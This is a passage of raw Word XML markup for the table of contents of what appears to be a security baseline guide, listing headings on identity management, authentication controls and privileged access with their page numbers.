              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449478" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Identity Management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449478 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="313A570F" w14:textId="16649A20" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449479" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Protect user’s identities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449479 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="262A998A" w14:textId="4BE32DDF" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449480" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449480 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B511AB9" w14:textId="3C9CA3FC" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449481" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IM-2: Protect identity and authentication systems</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449481 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="017B1203" w14:textId="5739B5FB" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449482" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IM-5: Use single sign-on (SSO) for application access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449482 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="696EB8A8" w14:textId="1F55A951" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449483" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IM-6: Use strong authentication controls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449483 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57AEEE61" w14:textId="11DD6025" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449484" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IM-7: Restrict resource access based on conditions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449484 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CFBF360" w14:textId="3E4D1CAE" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449485" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Protect applications and secrets</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449485 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18B4988C" w14:textId="7A10EAFB" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449486" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449486 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="634CF146" w14:textId="6786455A" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449487" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IM-4: Authenticate server and services</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449487 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19D0F009" w14:textId="428E7086" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449488" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449488 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F95486E" w14:textId="56808880" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449489" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privileged Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449489 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D08A8E3" w14:textId="011F6A2D" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449490" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Secure access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449490 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7043C8EE" w14:textId="79FD9935" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449491" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PA-1: Separate and limit highly privileged/administrative users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449491 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="738042B3" w14:textId="334EFDDC" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449492" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449492 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A8BD121" w14:textId="2191DFD2" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449493" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PA-3: Manage lifecycle of identities and entitlements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
